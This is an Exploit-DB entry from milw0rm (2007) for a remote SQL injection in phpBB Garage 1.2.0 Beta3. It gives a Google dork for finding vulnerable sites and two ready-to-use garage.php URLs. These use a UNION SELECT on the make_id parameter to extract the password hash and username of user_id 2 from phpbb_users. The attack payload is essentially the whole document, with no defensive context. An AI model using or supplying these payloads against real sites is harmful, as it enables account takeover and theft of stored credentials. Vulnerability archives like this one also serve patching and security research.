phpBB Garage 1.2.0 Beta3 - SQL Injection

EDB-ID:

4686


Author:

maku234

Type:

webapps


Platform:

PHP

Date:

2007-12-03


Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability
Dork:  "Powered By phpBB Garage 1.2.0"

Author:  maku234
E-Mail: maku234@gmail.com



garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*

# milw0rm.com [2007-12-03]